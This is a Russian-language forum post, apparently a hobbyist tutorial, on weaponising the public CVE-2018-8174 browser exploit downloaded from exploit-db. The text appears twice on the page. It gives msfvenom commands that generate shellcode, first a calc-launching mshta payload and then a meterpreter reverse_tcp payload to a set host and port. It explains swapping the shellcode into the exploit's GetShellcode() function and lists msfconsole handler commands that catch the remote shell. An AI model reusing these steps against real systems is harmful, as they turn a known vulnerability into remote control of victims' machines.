Наткнулся тут на статью про эксплоит CVE-2018-8174, сколько шума вокруг него.
Решил проверить лично, так как уж любят приукрасить журналисты.
Первым делом отправился на exploit-db скачал нужный эксплоит.
По традиции запустим калькулятор, стандартный payload мы юзать не будем а вместо этого выполним нашу команду:
И так payload мы сгенерировали получилось
Теперь нам нужно найти где выполняется шеллкод в эксплоите, в данном случае у нас оказалась строка
Функция GetShellcode()
Заменяем нашей строкой
Проверяем что у нас получилось.
Отлично все отработало!!!
Попробуем установить reverse connect
Сгенерируем новый payload
и повторим предыдущие действия, заменим строку шеллкода.
Но теперь будем ждать конекта, открываем консоль и вводим команды
И снова удача=)
Всем спасибо за внимание!!![/B]
статью написал leeex
Решил проверить лично, так как уж любят приукрасить журналисты.
Первым делом отправился на exploit-db скачал нужный эксплоит.
По традиции запустим калькулятор, стандартный payload мы юзать не будем а вместо этого выполним нашу команду:
Код:
msfvenom -p windows/exec cmd='mshta[removed]CreateObject("Wscript.Shell").Run("calc.exe",0,true)(window.close)' -f js_le a x86
(%ue8fc%u0082%u0000%u8960%u31e5%u64.......6573%u0029)
Теперь нам нужно найти где выполняется шеллкод в эксплоите, в данном случае у нас оказалась строка
Функция GetShellcode()
Заменяем нашей строкой
(%ue8fc%u0082%u0000%u8960%u31e5%u64.......6573%u0029).Проверяем что у нас получилось.
Отлично все отработало!!!
Попробуем установить reverse connect
Сгенерируем новый payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.78.1 LPORT=4444 -f js_le -a x86
и повторим предыдущие действия, заменим строку шеллкода.
Но теперь будем ждать конекта, открываем консоль и вводим команды
Код:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST ваш ip
set LPORT 4444
set ExitOnSession false
exploit -j -z
И снова удача=)
Всем спасибо за внимание!!![/B]
статью написал leeex